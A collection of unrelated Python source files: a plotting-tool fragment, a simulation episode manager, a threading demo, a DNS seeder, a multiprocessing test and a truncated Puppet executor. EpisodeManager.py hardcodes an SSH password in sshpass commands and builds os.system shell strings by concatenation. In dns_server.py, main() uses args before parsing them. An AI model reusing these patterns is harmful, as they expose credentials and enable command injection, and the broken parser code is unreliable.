node = utils.node_id(record["node_index"])
job = record["job_id"]
experiment = record["exper_name"]
workspace = record["ws"]
search_style = utils.safe_value(record, "search_style")
if search_style and search_style != "single":
# parent run with children - skip it
continue
log_records = record["log_records"]
metric_sets = run_helper.build_metrics_sets(log_records)
if not metric_sets:
no_metrics.append(run)
continue
if self.max_runs and len(pp_run_names) >= self.max_runs:
used_max = True
break
if not got_columns:
# set x and y columns
explicit = qfe.get_explicit_options()
if not "x" in explicit:
self.x_col = self.get_actual_x_column(metric_sets, self.x_col, self.col_names)
if not self.col_names:
# not specified by user, so build defaults
self.col_names = self.get_default_y_columns(metric_sets, self.x_col)
got_columns = True
# merge metric sets into dfx
for metric_set in metric_sets:
# create a pandas DataFrame
df = pd.DataFrame(metric_set["records"])
cols = str(list(df.columns))
# ensure this df has our x_col
if self.x_col and not self.x_col in cols:
continue
# ensure this df has at least 1 y_col
found_y = False
for y in self.col_names:
if y in cols:
found_y = True
break
if not found_y:
continue
# add run_name column
df["run"] = [run] * df.shape[0]
df["node"] = [node] * df.shape[0]
df["job"] = [job] * df.shape[0]
df["experiment"] = [experiment] * df.shape[0]
df["workspace"] = [workspace] * df.shape[0]
if not cols in data_frames_by_cols:
data_frames_by_cols[cols] = df
else:
dfx = data_frames_by_cols[cols]
dfx = dfx.append(df)
data_frames_by_cols[cols] = dfx
pp_run_names.append(run)
if no_metrics:
console.print("\nnote: following runs were skipped (currently have no logged metrics): \n {}\n".format(", ".join(no_metrics)))
if used_max:
console.print("plotting first {} runs (use --max-runs to override)".format(self.max_runs))
else:
console.print("plotting {} runs...".format(len(pp_run_names)))
# update our list of run_names to proces
self.run_names = pp_run_names
return data_frames_by_cols
def get_agg_df(self, df, agg_op, df_cols):
agg_dict = {}
for col in self.col_names:
if col in df_cols:
agg_dict[col] = agg_op
df_out = df.agg(agg_dict)
#df3 = df2.fillna(method='ffill')
df_out = df_out.reset_index()
return df_out
def pre_preprocess_data_frame(self, dfx):
'''
apply pre-processing operations to specified data frame:
- data frame most likely will NOT contain all y cols
- optionally smooth the Y-axis cols
- optionally create aggregate VALUE Y-axis cols
- optionally create aggregate SHADOW Y-axi cols
'''
if self.smoothing_factor:
# SMOOTH each column of values
for col in self.col_names:
if col in dfx.columns:
self.apply_smooth_factor(dfx, col, self.smoothing_factor)
# get a copy of columns before group-by
dfx_pre = dfx
df_cols = list(dfx.columns)
if self.aggregate:
# specifying an aggregate hides the the other runs' values (for now)
if self.group_by:
# GROUP data
group_col = self.group_by
group_prefix = "node" if self.group_by == "node_index" else ""
x_col = self.x_col
dfx = dfx.groupby([group_col, x_col])
# AGGREGATE data
df_agg_from = dfx
dfx = self.get_agg_df(df_agg_from, self.aggregate, df_cols)
# ERROR BARS data
if self.error_bars:
dfx = self.build_agg_stat(df_agg_from, self.error_bars, df_cols, dfx)
# SHADOW TYPE BARS data
if self.shadow_type == "min-max":
dfx = self.build_agg_stat(df_agg_from, "min", df_cols, dfx)
dfx = self.build_agg_stat(df_agg_from, "max", df_cols, dfx)
elif self.shadow_type and self.shadow_type != "pre-smooth":
dfx = self.build_agg_stat(df_agg_from, "mean", df_cols, dfx)
dfx = self.build_agg_stat(df_agg_from, self.shadow_type, df_cols, dfx)
# if self.shadow_type:
# self.run_names.append(self.shadow_type)
# min_values, max_values = self.range_runs(runs_dict, self.shadow_type)
# runs_dict[self.shadow_type] = (min_values, max_values)
return dfx
def build_agg_stat(self, df_agg_from, stat, df_cols, dfx):
df_stat = self.get_agg_df(df_agg_from, stat, df_cols)
stat_name = "_{}_".format(stat.upper())
for col in self.col_names:
if col in df_stat.columns:
# extract stat data for col
stat_data = df_stat[col]
# add col data as new name to dfx
dfx[col + stat_name] = stat_data
return dfx
def apply_smooth_factor(self, data_frame, col, weight):
presmooth_values = list(data_frame[col])
smooth_values = self.apply_smooth_factor_core(presmooth_values, weight)
data_frame[col] = smooth_values
data_frame[col + PRESMOOTH] = presmooth_values
def apply_smooth_factor_core(self, values, weight):
smooth_values = []
if values:
prev = values[0]
for value in values:
smooth = weight*prev + (1-weight)*value
smooth_values.append(smooth)
prev = smooth
return smooth_values
def calc_actual_layout(self, count, layout):
if not "x" in layout:
errors.syntax_error("layout string must be of form RxC (R=# rows, C=# cols)")
r,c = layout.split("x", 1)
if r:
r = int(r)
c = int(c) if c else math.ceil(count / r)
elif c:
c = int(c)
r = int(r) if r else math.ceil(count / c)
full_count = r*c
if full_count < count:
errors.combo_error("too many plots ({}) for layout cells ({})".format(count, full_count))
return r, c
def get_xy_values(self, data_frames_by_cols, group_name, x_col, y_col, stat_col):
x_values = None
y_values = None
stat_values = None
'''
Note: a specific y_col could exist in different data_frames, depending
on the other columns logged with in during each run. So, don't stop
searching on the first match with y_col - keep going until we get a
matching set of group_name records also.
'''
for cols, df in data_frames_by_cols.items():
if y_col in df.columns:
# filter values for specified run name
df = df[ df[self.group_by]==group_name ]
record_count = len(df.index)
if record_count:
y_values = df[ y_col ].to_numpy(dtype=float)
if x_col and x_col in df.columns:
x_values = df[ x_col ].to_numpy(dtype=float)
if stat_col and stat_col in df.columns:
stat_values = df[ stat_col ].to_numpy(dtype=float)
break
return x_values, y_values, stat_values
def plot_data(self, data_frames_by_cols):
console.diag("starting to plot data")
# on-demand import for faster XT loading
import seaborn as sns
import matplotlib.pyplot as plt
import matplotlib as mpl
import pylab
if not self.show_toolbar:
# hide the ugly toolbar at bottom left of plot window
mpl.rcParams['toolbar'] = 'None'
# apply seaborn styling
if self.style:
sns.set_style(self.style)
# decide how layout, titles, etc. will be set
group_names = set()
# gather group names (usually all are in the first dataset, but not always)
for dfx in data_frames_by_cols.values():
name_list = dfx[self.group_by].unique()
group_names.update(set(name_list))
group_names = list(group_names)
# this will sort the group names in a number-smart way
group_names.sort(key=utils.natural_keys)
group_count = len(group_names)
col_count = len(self.col_names)
break_on_groups = self.break_on and ("run" in self.break_on or "group" in self.break_on)
break_on_cols = self.break_on and "col" in self.break_on
if break_on_groups and break_on_cols:
plot_count = group_count*col_count
elif break_on_groups:
plot_count = group_count
elif break_on_cols:
plot_count = col_count
else:
plot_count = 1
# calc true layout
if self.layout:
plot_rows, plot_cols = self.calc_actual_layout(plot_count, self.layout)
else:
plot_cols = plot_count
plot_rows = 1
runs_per_plot = 1 if break_on_groups else group_count
cols_per_plot = 1 if break_on_cols else col_count
if runs_per_plot == 1:
plot_title = "$run"
legend_text = "$col"
elif cols_per_plot == 1:
plot_title = "$col"
legend_text = "$run"
else:
plot_title = None
legend_text = "$col ($run)"
if not self.plot_titles and plot_title:
self.plot_titles = [plot_title]
if not self.legend_titles:
self.legend_titles = [legend_text]
# configure matplotlib for our subplots
sharex = True
sharey = True
#plt.close()
window_size = (14, 6)
fig, plots = plt.subplots(plot_rows, plot_cols, figsize=window_size, sharex=sharex, sharey=sharey, constrained_layout=True)
if not isinstance(plots, np.ndarray):
# make it consistent with plot_count > 1 plots
plots = [plots]
elif plot_rows > 1:
plots = plots.flatten()
fig.suptitle(self.title, fontsize=16)
if self.timeout:
# build a thread to close our plot window after specified time
from threading import Thread
def set_timer(timeout):
console.print("set_timer called: timeout=", self.timeout)
time.sleep(self.timeout)
console.diag("timer triggered!")
plt.close("all")
print("closed all plots and the fig")
thread = Thread(target=set_timer, args=[self.timeout])
thread.daemon = True # mark as background thread
thread.start()
line_index = 0
plot_index = 0
trace_count = 0
x_label = self.x_label if self.x_label else self.x_col
if self.aggregate == "none":
self.aggregate = None
if (self.aggregate and (break_on_cols and not break_on_groups)) \
or ((not self.aggregate) and break_on_cols):
# columns needs to be the outer loop
for c, col in enumerate(self.col_names):
if trace_count >= self.max_traces:
break
if c and break_on_cols:
plot_index += 1
line_index = 0
for r, group_name in enumerate(group_names):
if trace_count >= self.max_traces:
break
if r and break_on_groups:
plot_index += 1
line_index = 0
# PLOT MIDDLE
ax = plots[plot_index] # .gca()
self.plot_middle(data_frames_by_cols, ax, group_name, col, self.x_col, x_label, line_index)
line_index += 1
trace_count += 1
else:
# run will work as the outer loop
for r, group_name in enumerate(group_names):
if trace_count >= self.max_traces:
break
if r and break_on_groups:
plot_index += 1
line_index = 0
for c, col in enumerate(self.col_names):
if trace_count >= self.max_traces:
break
if c and break_on_cols:
plot_index += 1
line_index = 0
# PLOT MIDDLE
ax = plots[plot_index] #.gca()
self.plot_middle(data_frames_by_cols, ax, group_name, col, self.x_col, x_label, line_index)
line_index += 1
trace_count += 1
if self.save_to:
plt.savefig(self.save_to)
if self.show_plot:
pylab.show()
def get_seaborn_color_map(self, name, n_colors=5):
'''
name: muted, xxx
'''
import seaborn as sns
from matplotlib.colors import ListedColormap
# Construct the colormap
current_palette = sns.color_palette(name, n_colors=n_colors)
cmap = ListedColormap(sns.color_palette(current_palette).as_hex())
return cmap
def plot_middle(self, data_frames_by_cols, ax, group_name, col, x_col, x_label, line_index):
color_index = line_index % len(self.colors)
color = self.colors[color_index]
if self.shadow_type == "pre-smooth":
# draw PRESMOOTH SHADOW
x, y, _ = self.get_xy_values(data_frames_by_cols, group_name, self.x_col, col + PRESMOOTH, None)
self.plot_inner(ax, group_name, col, self.x_col, x_label, line_index, x_values=x, y_values=y,
color=color, alpha=self.shadow_alpha, use_y_label=False)
elif self.shadow_type:
if self.shadow_type == "min-max":
x, y, _ = self.get_xy_values(data_frames_by_cols, group_name, self.x_col, col + MIN, None)
x2, y2, _ = self.get_xy_values(data_frames_by_cols, group_name, self.x_col, col + MAX, None)
else:
# draw RANGE SHADOW
stat_name = "_{}_".format(self.shadow_type.upper())
x, y_mean, _ = self.get_xy_values(data_frames_by_cols, group_name, self.x_col, col + MEAN, None)
x, y_stat, _ = self.get_xy_values(data_frames_by_cols, group_name, self.x_col, col + stat_name, None)
y = y_mean - y_stat
y2 = y_mean + y_stat
self.plot_inner(ax, group_name, col, self.x_col, x_label, line_index, x_values=x, y_values=y,
color=color, alpha=self.shadow_alpha, use_y_label=False, y2_values=y2)
# DRAW NORMAL LINE
err_col = col + "_{}_".format(self.error_bars.upper()) if self.error_bars else None
x, y, err = self.get_xy_values(data_frames_by_cols, group_name, self.x_col, col, err_col)
self.plot_inner(ax, group_name, col, self.x_col, x_label, line_index, x_values=x, y_values=y,
color=color, alpha=1, use_y_label=True, err_values=err)
def plot_inner(self, ax, run_name, col, x_col, x_label, line_index, x_values, y_values,
color, alpha, use_y_label, y2_values=None, err_values=None):
import seaborn as sns
from matplotlib.ticker import MaxNLocator
if x_values is None:
x_values = range(len(y_values))
else:
ax.set_xlabel(x_label)
console.detail("x_values=", x_values)
console.detail("y_values=", y_values)
console.detail("y2_values=", y2_values)
num_y_ticks = 10
ax.get_yaxis().set_major_locator(MaxNLocator(num_y_ticks))
#color = self.colors[line_index % len(self.colors)]
if use_y_label:
line_title = self.legend_titles[line_index % len(self.legend_titles)]
line_title = self.fixup_text(line_title, run_name, col)
else:
line_title = None
cap_size = 5
is_range_plot = bool(y2_values is not None)
# our default attributes
kwargs = {"label": line_title, "color": color, "alpha": alpha}
if not is_range_plot:
kwargs["capsize"] = cap_size
# let user override
if self.plot_args and not is_range_plot:
for name, value in self.plot_args.items():
value = utils.make_numeric_if_possible(value)
kwargs[name] = value
#cmap = self.get_seaborn_color_map("muted")
if self.plot_type == "line":
if is_range_plot:
# RANGE plot
ax.fill_between(x_values, y_values, y2_values, **kwargs)
elif x_values is not None:
# X/Y LINE plot
trace = ax.errorbar(x_values, y_values, yerr=err_values, **kwargs)
else:
# LINE plot
ax.errorbar(y_values, '-', label=line_title, yerr=err_values, **kwargs)
else:
# for now, we can get lots of milage out of line plot (errorbars, scatter, scatter+line)
# so keep things simple and just support 1 type well
errors.syntax_error("unknown plot type={}".format(self.plot_type))
if self.plot_titles:
plot_title = self.plot_titles[line_index % len(self.plot_titles)]
plot_title = self.fixup_text(plot_title, run_name, col)
ax.set_title(plot_title)
if self.show_legend:
ax.legend()
if self.legend_args:
# pass legend args to legend object
ax.legend(**self.legend_args)
def fixup_text(self, text, run_name, col):
text = text.replace("$run", run_name)
text = text.replace("$col", col)
return text
def get_actual_x_column(self, metric_sets, default_x_col, y_cols):
'''
x col search order:
- specified in cmd line (explict_options, checked by caller)
- specified as 'step_name" in logged metrics (matching y_cols)
- specified as 'step_name" in first logged metrics (if no y_cols specified)
- config file step_name property
- guess from a list of commonly used named
'''
x_col = None
first_y = y_cols[0] if y_cols else None
for ms in metric_sets:
keys = ms["keys"]
if first_y and not first_y in keys:
continue
if constants.STEP_NAME in keys:
records = ms["records"]
x_col = records[0][constants.STEP_NAME]
elif default_x_col:
x_col = default_x_col
else:
# try guessing from common names (and __index__, sometimes added by XT)
x_names = ["epoch", "step", "iter", "epochs", "steps", "iters", constants.INDEX]
for xn in x_names:
if xn in keys:
x_col = xn
break
# only look in first metric set
break
return x_col
def get_default_y_columns(self, metric_sets, x_col):
y_cols = []
for ms in metric_sets:
keys = ms["keys"]
omits = [x_col, constants.STEP_NAME, constants.TIME]
for key in keys:
if not key in omits:
y_cols.append(key)
# only look in first metric set
break
return y_cols
def range_runs(self, runs_dict, range):
runs = list(runs_dict.values())
if range == "min-max":
min_values = np.min(runs, axis=0)
max_values = np.max(runs, axis=0)
elif range == "std":
means = np.mean(runs, axis=0)
max_values = means + np.std(runs, axis=0)
min_values = means - np.std(runs, axis=0)
elif range == "error":
from scipy import stats
means = np.mean(runs, axis=0)
max_values = means + stats.sem(runs, axis=0)
min_values = means - stats.sem(runs, axis=0)
else:
errors.syntax_error("unrecognized range value: {}".format(range))
return min_values, max_values
def get_values_by_run(self, col, run_log_records):
runs_dict = {}
for rr in run_log_records:
run_name = rr["_id"]
value_recs = rr["metrics"]["records"]
new_values = [vr[col] for vr in value_recs]
runs_dict[run_name] = new_values
return runs_dict
|
EpisodeManager.py
|
#!/usr/bin/env python3
#
# This file includes mainly a class "EpisodeManager" and some utility function called get_ip
# Author: Michele
# Project: SmartLoader - Innovation
#
# For now, hard coded:
# sim_host="192.168.100.21"
# sim_port= 22
# scenario_file="/home/sload/InitialScene.json"
# oururl_file = "/home/sload/URLConfig.json"
# destination_scenario="./UnityBuild/smartloader/smartloader_Data/StreamingAssets/InitialScene.json"
# destination_url="./UnityBuild/smartloader/smartloader_Data/StreamingAssets/URLConfig.json"
# # run_simulation_cmd="./UnityBuild/smartloader/smartloader.exe"
# run_simulation_cmd="c:/Pstools/psexec /accepteula -i 1 -d c:/users/gameuser/UnityBuild/smartloader/smartloader.exe"
# kill_simulation_cmd="c:/Pstools/psexec /accepteula -i 1 -d taskkill /F /IM smartloader.exe"
import sys, os, time
import os.path
import re
from shutil import copyfile
import logging
import multiprocessing as mp
from multiprocessing import Process, Queue
from paramiko import SSHClient, AuthenticationException, SSHException, BadHostKeyException
from scp import SCPClient
import socket
import json
from src.DrawingEpisodes import randomEpisode, MultipleRocksEpisode
### The goal of this function is to determine the IP address of the computer running this module.
### Knowing the IP address will allow to configure the URLConfig.json for the simulation without human intervention
def get_ip():
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
try:
# doesn't even have to be reachable
s.connect(('10.255.255.255', 1))
IP = s.getsockname()[0]
except:
IP = '127.0.0.1'
finally:
s.close()
return IP
# The class EpisodeManager deals with everything that has to do with an episode for training an agent with RL.
# It is compliant with gym methodology.
# What should be called:
# episode = EpisodeManager()
# episode.generateAndRunWholeEpisode()
# episode.killSimulation()
# Note that if you want to run the same episode each time, you should call:
# episode.runEpisode()
#
#
class EpisodeManager:
local = False
scenario = {}
scenarioConfigFile = open("InitialScene.json", 'wt')
sim_host="192.168.100.21"
sim_port= 22
scenario_file="/home/sload/InitialScene.json"
oururl_file = "/home/sload/URLConfig.json"
destination_scenario="./UnityBuild/smartloader/smartloader_Data/StreamingAssets/InitialScene.json"
destination_url="./UnityBuild/smartloader/smartloader_Data/StreamingAssets/URLConfig.json"
# run_simulation_cmd="./UnityBuild/smartloader/smartloader.exe"
run_simulation_cmd="c:/Pstools/psexec /accepteula -i 1 -d c:/users/gameuser/UnityBuild/smartloader/smartloader.exe"
kill_simulation_cmd="c:/Pstools/psexec /accepteula -i 1 -d taskkill /F /IM smartloader.exe"
simProcess = 0
myip = get_ip()
myurl= ""
def generateNewSerieScenario(self, new_seed):
# new_seed=rnd.seed(None,2)
print("start a new serie of scenarios:"+new_seed.__str__())
randomEpisode(new_seed)
def generateNewScenario(self,typeOfRand, numstones, marker):
print("generate new scenario")
if typeOfRand == "verybasic":
path = os.getcwd()
file = path +"/VeryBasicInitialScene.json"
copyfile(file,"InitialScene.json")
elif typeOfRand == "MultipleRocks":
MultipleRocksEpisode(0, numstones, marker)
else:
randomEpisode(typeOfRand, 0)
# This method secure copies a file to a remote computer
def ssh_scp_file(self, ssh_host, ssh_user, ssh_password, ssh_port, source_volume, destination_volume):
logging.info("In ssh_scp_files()method, to copy the files to the server")
if (self.local):
command = "cp " + source_volume + " " + destination_volume
else:
command = "sshpass -p " + ssh_password + " scp "+ source_volume+" " + ssh_user +"@"+ssh_host+":"+destination_volume
print(command)
os.system(command)
# This method encapsulates ssh_scp_files and copies all the files needed via secure cp to the computer that runs Unity
def scpScenarioToSimulation(self):
print("scp to simulation")
# self.ssh_scp_files(self.this_host,"gameuser","PlayMe1", self.this_port, "/home/sload/InitialScene.json", "AAAAA.json")
self.ssh_scp_file(self.sim_host,"gameuser","PlayMe1", self.sim_port, self.scenario_file, self.destination_scenario)
self.ssh_scp_file(self.sim_host,"gameuser","PlayMe1", self.sim_port, self.oururl_file, self.destination_url)
def runSimulation(self):
print("Run Simulation Brutal Force")
if (self.local):
command = self.run_simulation_cmd
else:
command = "sshpass -p PlayMe1 ssh "+self.sim_host+" -l gameuser "+ self.run_simulation_cmd
#command = "sshpass -p PlayMe1 ssh 192.168.100.21 -l gameuser "+ self.run_simulation_cmd
print(command)
os.system(command)
def killSimulation(self):
print("Kill Simulation Brutal Force")
if (self.local):
command = self.kill_simulation_cmd
else:
command = "sshpass -p PlayMe1 ssh "+self.sim_host+" -l gameuser "+ self.kill_simulation_cmd
# command = "sshpass -p PlayMe1 ssh 192.168.100.21 -l gameuser "+ self.kill_simulation_cmd
print(command)
os.system(command)
def runEpisode(self):
if self.simProcess != 0:
print("Simulation is already running... wait few minutes and try again")
return
# self.scpScenarioToSimulation()
try:
self.simProcess = mp.Process(target=self.runSimulation())
self.simProcess.start()
except:
time.sleep(1)
# self.generateAndRunWholeEpisode("verybasic")
def generateAndRunWholeEpisode(self, typeOfRand, numstones, marker):
if self.simProcess != 0:
print("Simulation is already running... wait few minutes and try again")
return
self.generateNewScenario(typeOfRand, numstones, marker)
try:
self.scpScenarioToSimulation()
except:
time.sleep(1)
print("Stopped this scenario: try runEpisode")
raise #("Banner")
else:
try:
self.simProcess = mp.Process(target=self.runSimulation())
self.simProcess.start()
except:
time.sleep(1)
print("Stopped this scenario here")
raise #("Banner")
def __init__(self):
# Where are we
mydic = sys.path
mypath = ""
for i in mydic:
if (i.find("simcom")!=-1):
mypath = i
break
if mypath != "":
tlocal = mypath
else:
tlocal = os.getcwd()
print(tlocal)
local = re.sub('/src$', '', tlocal)
configDir = local +"//config"
os.chdir(configDir)
local = os.getcwd()
confFile = configDir+"//config.json"
if (os.path.exists(confFile)):
with open(confFile) as json_file:
data = json.load(json_file)
self.sim_host = data['sim_host']
if (self.sim_host == "127.0.0.1"):
self.local = True
else:
self.local = False
self.sim_port = data['sim_port']
self.scenario_file = configDir+"//"+data['scenario_file']
self.oururl_file = configDir+"//"+data['oururl_file']
self.sim_root = os.getenv('HOME') + '//' + data['sim_root']
if self.local == True:
self.destination_scenario = self.sim_root + "//" + data['destination_scenario']
self.destination_url = self.sim_root + "//" +data['destination_url']
self.run_simulation_cmd = self.sim_root + "//" + data['run_simulation_cmd']
else:
self.destination_scenario = data['destination_scenario']
self.destination_url = data['destination_url']
self.run_simulation_cmd=data['run_simulation_cmd']
self.kill_simulation_cmd = data['kill_simulation_cmd']
#else: works with default
#
# Get the IP address of this machine and throw it in the URLConfig.json file
self.myip = get_ip()
self.myurl = "ws://"+self.myip.__str__()+":9090"
print(self.myurl)
data2 = {}
data2['URL'] = self.myurl
#data['URL'].append(self.myurl)
with open(self.oururl_file, 'w') as outfile:
json.dump(data2, outfile)
if __name__ == '__main__':
episode = EpisodeManager()
#episode.ScpScenarioToSimulation()
mp.set_start_method('fork')
episode.generateAndRunWholeEpisode("recorder")
# sometimerproc = mp.Process(target=episode.killSimulation())
# print("I am after calling to kill")
# episode.simProcess = mp.Process(target=episode.runSimulation())
# sometimerproc.start()
print("I am before start")
# episode.simProcess.start()
print("I am here")
time.sleep(60)
print("I am here-here")
episode.killSimulation()
print("I am here-here-here")
|
main.py
|
#!/usr/bin/env python3
#
# https://docs.python.org/3/library/threading.html
#
import threading
import time
# --- classes ---
class ExampleThread(threading.Thread):
def __init__(self, name, counter=10, sleep=0.5):
threading.Thread.__init__(self)
self.name = name
self.counter = counter
self.sleep = sleep
def run(self):
for x in range(self.counter):
print(self.name, x)
time.sleep(self.sleep)
# --- functions ---
def example_function(name, counter=10, sleep=0.5):
for x in range(counter):
print(name, x)
time.sleep(sleep)
# --- example 1 ---
# `args` have to be tuple.
# for one argument you need `args=("function:",)`
t1 = threading.Thread(target=example_function, args=("function:", 15))
t1.start()
# --- example 2 ---
t2 = ExampleThread("class:", 10, 1.0)
t2.start()
# --- example 2 ---
# start thread after 3 seconds
t3 = threading.Timer(3, example_function, args=("** timer **:", 2, 3.0))
t3.start()
|
dns_server.py
|
#!/usr/bin/env python
# coding=utf-8
from mn_rand_ips import MNRandIPs
import argparse
import datetime
import sys
import time
import threading
import traceback
import SocketServer
import struct
import logging
try:
from dnslib import *
except ImportError:
logging.error("Missing dependency dnslib: <https://pypi.python.org/pypi/dnslib>. Please install it with `pip`.")
sys.exit(2)
logging.basicConfig(filename='/home/ubuntu/seeder.log', level=logging.DEBUG)
class DomainName(str):
def __getattr__(self, item):
return DomainName(item + '.' + self)
DOMAN_NAME = 'dnsseed1.innoket.org'
IP = '127.0.0.1'
NS = "ns1.innoket.org"
D = DomainName(DOMAN_NAME)
TTL = 60 * 5
soa_record = SOA(
mname=D.ns1, # primary name server
rname=D.chcdev,
times=(
201307231, # serial number
60 * 60 * 1, # refresh
60 * 60 * 3, # retry
60 * 60 * 24, # expire
60 * 60 * 1, # minimum
)
)
ns_records = [NS(D.ns1), NS(D.ns2)]
records = {
D: [A(IP), AAAA((0,) * 16), MX(D.mail), soa_record] + ns_records,
D.ns1: [A(IP)], # MX and NS records must never point to a CNAME alias (RFC 2181 section 10.3)
D.ns2: [A(IP)],
D.mail: [A(IP)],
D.andrei: [CNAME(D)],
}
mn_rand_ips = MNRandIPs()
mn_rand_ips.refresh_mn_ips()
ips_per_req = 8
_NS_RECORD = "NS"
def dns_response(data):
request = DNSRecord.parse(data)
logging.info(request)
reply = DNSRecord(DNSHeader(id=request.header.id, qr=1, aa=1, ra=1), q=request.q)
qname = request.q.qname
qn = str(qname)
qtype = request.q.qtype
qt = QTYPE[qtype]
if qt == "NS":
reply.add_answer(*RR.fromZone(DOMAN_NAME + " 3600 NS " + NS))
reply.add_ar(*RR.fromZone(NS + " A " + IP))
else:
domain_name_a = DOMAN_NAME + " A "
for ip in mn_rand_ips.get_random_x_ips( ips_per_req ):
reply.add_answer(*RR.fromZone(domain_name_a + ip))
logging.info("---- Reply: %s\n", str(reply) )
return reply.pack()
class BaseRequestHandler(SocketServer.BaseRequestHandler):
def get_data(self):
raise NotImplementedError
def send_data(self, data):
raise NotImplementedError
def handle(self):
now = datetime.datetime.utcnow().strftime('%Y-%m-%d %H:%M:%S.%f')
logging.info("\n\n%s request %s (%s %s):" % (self.__class__.__name__[:3], now, self.client_address[0],
self.client_address[1]))
try:
data = self.get_data()
logging.info(str(len(data)) + " : " + str(data) ) # repr(data).replace('\\x', '')[1:-1]
self.send_data(dns_response(data))
except Exception as e:
logging.error("Error handling reques" + str(e) )
logging.error(str(traceback.print_exc()))
class TCPRequestHandler(BaseRequestHandler):
def get_data(self):
data = self.request.recv(8192).strip()
sz = struct.unpack('>H', data[:2])[0]
if sz < len(data) - 2:
raise Exception("Wrong size of TCP packet")
elif sz > len(data) - 2:
raise Exception("Too big TCP packet")
return data[2:]
def send_data(self, data):
sz = struct.pack('>H', len(data))
return self.request.sendall(sz + data)
class UDPRequestHandler(BaseRequestHandler):
def get_data(self):
return self.request[0].strip()
def send_data(self, data):
return self.request[1].sendto(data, self.client_address)
def main():
parser = argparse.ArgumentParser(description='Start a DNS implemented in Python.')
parser = argparse.ArgumentParser(description='Start a DNS implemented in Python. Usually DNSs use UDP on port 53.')
parser.add_argument('--port', default=53, type=int, help='The port to listen on.')
parser.add_argument('--tcp', action='store_true', help='Listen to TCP connections.')
parser.add_argument('--udp', action='store_true', help='Listen to UDP datagrams.')
parser.add_argument('--DNS', type=str, help='DNS address for the server.')
if not args.DNS: parser.error("Please add a DNS")
DOMAN_NAME = args.DNS
parser.add_argument('--IP', type=str, help='IP address for the server.')
if not args.IP: parser.error("Please add an IP")
IP = args.IP
parser.add_argument('--NS', type=str, help='NS address for the server.')
if not args.NS: parser.error("Please add a NS")
NS = args.NS
args = parser.parse_args()
if not (args.udp or args.tcp): parser.error("Please select at least one of --udp or --tcp.")
logging.info("Starting nameserver...")
servers = []
if args.udp: servers.append(SocketServer.ThreadingUDPServer(('', args.port), UDPRequestHandler))
if args.tcp: servers.append(SocketServer.ThreadingTCPServer(('', args.port), TCPRequestHandler))
for s in servers:
thread = threading.Thread(target=s.serve_forever) # that thread will start one more thread for each request
thread.daemon = True # exit the server thread when the main thread terminates
thread.start()
logging.info("%s server loop running in thread: %s" % (s.RequestHandlerClass.__name__[:3], thread.name))
try:
while 1:
time.sleep(1)
sys.stderr.flush()
sys.stdout.flush()
except KeyboardInterrupt:
pass
finally:
for s in servers:
s.shutdown()
if __name__ == '__main__':
main()
|
test_mp.py
|
import numpy as np
import torch
import torch.multiprocessing as mp
mp.set_start_method('spawn', force=True)
import time
import uuid
import queue
import logging
import cv2
def test_input_output(idx, qin, qout):
print(f'{idx} start')
duration = 0
count = 0
while True:
start = time.time()
tensor = qin.get()
print(f"{idx} get")
tensor = torch.nn.functional.interpolate(tensor, size=(640,352))
qout.put(tensor)
print(f"{idx} put")
duration += time.time()-start
count += 1
if count == 10:
break
time.sleep(3)
print(f'{idx} avg {(duration/count)*1000:.1f}ms')
def test_output(idx, qout):
print(f'{idx} start')
duration = 0
for _ in range(10):
start = time.time()
data = np.ones((1920,1080,3), dtype=np.uint8)
data = cv2.resize(data, (352,640))
tensor = torch.from_numpy(data).cuda()
tensor = tensor.permute(2,0,1).unsqueeze(0).share_memory_()
qout.put(tensor)
del tensor
duration += time.time()-start
print(f'{idx} avg {(duration/10)*1000:.1f}ms')
time.sleep(60)
def main_input_output():
qins = []
qouts = []
ps = []
inputs = []
for i in range(5):
qin = mp.Queue(10)
qout = mp.Queue(10)
p = mp.Process(target=test_input_output, args=(i, qin, qout,))
a = torch.rand(1,3,1920,1080).cuda()
p.start()
ps.append(p)
qins.append(qin)
qouts.append(qout)
inputs.append(a)
time.sleep(1)
start = time.time()
for _ in range(10):
for a, qin in zip(inputs, qins):
a.share_memory_()
qin.put(a)
for qout in qouts:
tensor = qout.get()
# print('shared', a.is_shared())
# print("put")
print('put total time', (time.time() - start)/10)
for p in ps:
p.join()
p.close()
def main_output():
qouts = []
ps = []
for i in range(5):
qout = mp.Queue(10)
p = mp.Process(target=test_output, args=(i, qout,))
p.start()
ps.append(p)
qouts.append(qout)
time.sleep(1)
start = time.time()
count = 0
while True:
for qout in qouts:
try:
tensor = qout.get_nowait()
count += 1
except queue.Empty:
pass
if count == 50:
break
print('get total time', (time.time() - start)/50)
for p in ps:
p.join()
p.close()
if __name__ == "__main__":
main_output()
|
PuppetExecutor.py
|
#!/usr/bin/env python2.6
'''
Licensed to the Apache Software Foundation (ASF) under one
or more contributor license agreements. See the NOTICE file
distributed with this work for additional information
regarding copyright ownership. The ASF licenses this file
to you under the Apache License, Version 2.0 (the
"License"); you may not use this file except in compliance
with the License. You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
'''
import json
import os.path
import logging
import subprocess
import pprint
import threading
from threading import Thread
from shell import shellRunner
import manifestGenerator
from RepoInstaller import RepoInstaller
from Grep import Grep
import shell
JAVANOTVALID_MSG = "Cannot access JDK! Make sure you have permission to execute {0}/bin/java"
logger = logging.getLogger()
class PuppetExecutor:
""" Class that executes the commands that come from the server using puppet.
This is the class that provides the pluggable point for executing the puppet"""
grep = Grep()
NO_ERROR = "none"
def __init__(self, puppetModule, puppetInstall, facterInstall, tmpDir, config):
self.puppetModule = puppetModule
self.puppetInstall = puppetInstall
self.facterInstall = facterInstall
self.tmpDir = tmpDir
self.reposInstalled = False
self.config = config
self.modulesdir = self.puppetModule + "/modules"
self.event = threading.Event()
self.last_puppet_has_been_killed = False
self.sh = shellRunner()
self.puppet_timeout = config.get("puppet", "timeout_seconds")
def configureEnviron(self, environ):
if not self.config.has_option("puppet", "ruby_home"):
return environ
ruby_home = self.config.get("puppet", "ruby_home")
if os.path.exists(ruby_home):
"""Only update ruby home if the config is configured"""
path = os.environ["PATH"]
if not ruby_home in path:
environ["PATH"] = ruby_home + os.path.sep + "bin" + ":"+environ["PATH"]
environ["MY_RUBY_HOME"] = ruby_home
return environ
def getPuppetBinary(self):
puppetbin = os.path.join(self.puppetInstall, "bin", "puppet")
if os.path.exists(puppetbin):
return puppetbin
else:
